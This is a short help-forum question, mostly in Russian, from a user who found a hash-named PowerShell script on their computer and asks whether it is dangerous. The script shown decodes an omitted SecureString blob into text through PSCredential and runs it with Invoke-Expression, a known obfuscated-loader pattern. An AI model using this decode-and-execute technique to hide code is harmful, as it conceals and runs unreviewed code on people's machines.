Я нашел скрипт с именем 5cfdf61c454c1fc5e9f0fcad2d12d5ef.ps1
на моем компьютере:
$pyfwthc = # this is just a TON of random letters and numbers didnt wanna waste the space and its probably not important (encrypted maybe?)
$sstring = ConvertTo-SecureString $pyfwthc
$script = (New-Object system.Management.Automation.PSCredential("pyfwthc", $sstring)).GetNetworkCredential().Password
Invoke-Expression $script
Это то, что я должен беспокоиться?